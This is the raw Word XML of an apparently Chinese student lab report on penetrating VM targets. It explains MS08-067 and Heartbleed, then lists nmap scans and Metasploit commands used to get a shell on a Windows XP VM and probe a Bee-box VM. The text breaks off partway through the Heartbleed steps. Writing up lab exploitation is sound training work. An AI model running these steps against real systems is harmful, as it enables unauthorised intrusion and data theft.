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4A6C1F15">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="网络攻防项目3-靶机渗透"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>网络攻防项目3-靶机渗透</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606B6E1D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="ms08-067漏洞"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>MS08-067漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9D7AFC">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="漏洞描述"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB1F2AD">
      <w:pPr>
        <w:pStyle w:val="23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>MS08-067漏洞全称是“Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Server服务RPC请求缓冲区溢出漏洞”，攻击者利用受害者主机默认开放的SMB服务端口445，发送特殊RPC（Remote</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> Procedure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Call，远程过程调用）请求，造成栈缓冲区内存错误，从而被利用实施远程代码执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E42BF1">
      <w:pPr>
        <w:pStyle w:val="3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>通过MSRPC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的。NetpwPathCanonicalize函数在远程访问其他主机时，会调用CanonicalizePathName函数，对远程访问的路径进行规范化（将路径字符串中的'/'转换为'',同时去除相对路径"."和".."），而在CanonicalizePathName函数中调用的RemoveLegacyFolder发生了栈缓冲区溢出，可以造成RCE。利用该漏洞可以达到远程代码执行的效果，通过使用不同的shellcode，可以实现任意功能，但是shellcode空间大小有限制。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>它影响了某些旧版本的Windows系统，包括：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F184996">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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>Windows 2000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC4583F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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>Windows XP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E2300A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr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>Windows Server 2003</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="4EFE887A">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="渗透过程"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>渗透过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F6C8B8">
      <w:pPr>
        <w:pStyle w:val="23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>使用VMware安装虚拟机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CBF1C8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr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>关闭windowsXP靶机防火墙</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8E73D1">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22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" title="fig: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3114744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49426B3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>使用ipconfig获取靶机ip地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D01822">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3114675"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="25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" title="fig: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3114744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0199F7C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>使用nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT -O -p 445 192.168.132.132 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>扫描靶机系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D4D9EF9">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4848225" cy="3603625"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="28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" title="fig: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848625" cy="3603811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913FB0B">
      <w:pPr>
        <w:pStyle w:val="3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>发现445端口开放，即我们将要攻击的端口是开放的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2F03DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> nmap -sV -sT --script=vuln -p 445 192.168.132.132 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>（sV服务探测，sT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>TCP协议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> --script=vuln </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>是namp的漏洞脚本扫描）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6029B2FB">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="5683250"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="31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" title="fig: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5683871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367887F">
      <w:pPr>
        <w:pStyle w:val="3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>扫描出了今天使用的MS08-067漏洞，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>而上面的ms17-010也是一个著名的"永恒之蓝"漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B329A1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>输出msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>启动msf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>后，执行下列操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1C5EA1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr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>输入search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> ms08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072EDF01">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3329305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="34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" title="fig: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3329582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5295A33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr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>输入use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>进入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB97B77">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3795395" cy="283845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="37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" title="fig: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795912" cy="284309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792B901">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr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>输入show</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> options </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>查看漏洞利用选项</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B245E2D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1904365"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40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" title="fig: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1904664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765FD25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr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>输入set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> rhost 192.168.132.132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B5C59">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr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 xml:space="preserve">show targets </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>查看payload参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>根据安装的ISO镜像选择,set</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> targets10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B4DBA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="3329305"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43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" title="fig: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3329582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304E674">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr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>输入run或者exploit弹出后输入shell成功获取靶机权限</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A86F388">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5334000" cy="1364615"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46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" title="fig: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1365071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5F9B8C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>测试，输入dir输出靶机目录下文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43926004">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3795395" cy="4694555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49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" title="fig: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795912" cy="4694944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187B8E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>渗透成功</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="558A69B7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="heartbleed"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Heartbleed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F832FB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="心脏滴血漏洞简述"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>心脏滴血漏洞简述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D004CAF">
      <w:pPr>
        <w:pStyle w:val="23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>2014年4月7日，OpenSSL发布安全公告，在OpenSSL1.0.1版本至OpenSSL1.0.1f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Beta1版本中存在漏洞，该漏洞中文名称为心脏滴血，英文名称为HeartBleed。其中Heart是指该漏洞位于心跳协议上，Bleed是因为该漏洞会造成数据泄露。即HeartBleed是在心跳协议上的一个数据泄露漏洞，OpenSSL库中用到了该心跳协议。HeartBleed主要存在与OpenSSL的1.0.1版本到1.0.1f版本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F2165E">
      <w:pPr>
        <w:pStyle w:val="3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>利用该漏洞，攻击者可以远程读取服务器内存中64K的数据，获取内存中的敏感信息。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3763583B">
      <w:pPr>
        <w:pStyle w:val="3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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="61D03C79">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="漏洞范围"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>漏洞范围</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF1F00">
      <w:pPr>
        <w:pStyle w:val="23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  <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OpenSSL 1.0.1*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>*版本**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA44303">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3149C93D">
      <w:pPr>
        <w:pStyle w:val="3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>ssl、tls、dtls介绍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5B224B">
      <w:pPr>
        <w:pStyle w:val="3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>在网络当中中，TCP/IP协议层之上的安全可以由Secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> Socket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Layer(SSL)及其替代协议Transport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> Layer Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>(TLS)进行保障。这两个协议经常被称作SSL/TLS。HTTP是一个无状态的应用层协议，主要用来在服务器和客户端之间传输数据。HTTPS主要通过在HTTP层和TCP层之间增加了SSL/TLS层来保证服务器与客户端之间安全的传输数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30224A9C">
      <w:pPr>
        <w:pStyle w:val="3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 xml:space="preserve">DTLS(Datagram Transport Layer </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>Security)即数据包传输层安全性协议，主要是试图在TLS协议架构上提出扩展，使之支持UDP。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710D77D4">
      <w:pPr>
        <w:pStyle w:val="3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>TLS/DTLS中的心跳协议主要使用来检测两个设备之间是否还有连接的，根据RFC规定，心跳协议运行在TLS记录层之上，主要是通过交换“心跳”的方式，用来维持端与端之间的连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFEA443">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p w14:paraId="399724DF">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="渗透过程-2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>渗透过程</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E493E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr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>环境搭建</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17BC74BA">
      <w:pPr>
        <w:pStyle w:val="23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>靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> Bee-box-&gt; 192.168.132.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B6D77">
      <w:pPr>
        <w:pStyle w:val="3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>攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve"> kali-&gt;192.168.132.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53363F6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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 xml:space="preserve">ping bee_box </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>测试网络连通性</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEEAB08">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3903345" cy="1536700"/>
            <wp:effectExtent l="0" t="0" r="13335" b="2540"/>
            <wp:docPr id="56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" title="fig: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903489" cy="1536806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C11F888">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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 xml:space="preserve">nmap -O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
        </w:rPr>
        <w:t>查看端口8443是否开放</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293F9D72">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4464050" cy="3918585"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="59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" title="fig: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64423" cy="3918857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7756D5E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>使用nmap的ssl-heartbleed.nse扫描查看是否存在漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B471F6">
      <w:pPr>
        <w:pStyle w:val="23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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4786630" cy="3180715"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62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" title="fig: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87152" cy="3181189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4C299F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr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>存在漏洞，随后使用msf进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165842B8">
      <w:pPr>
        <w:pStyle w:val="23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>search heartbleed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE5F0B">
      <w:pPr>
        <w:pStyle w:val="3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>use auxiliary/scanner/ssl/openssl_heartbleed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC87283">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4879340" cy="4310380"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65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" title="fig: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79361" cy="4310742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4A81ACB">
      <w:pPr>
        <w:pStyle w:val="3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>set rhosts 192.168.132.133</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD78B90">
      <w:pPr>
        <w:pStyle w:val="3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>set rport 8443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C1EFE6">
      <w:pPr>
        <w:pStyle w:val="3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>set verbose true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F42430">
      <w:pPr>
        <w:pStyle w:val="3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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4879340" cy="783590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
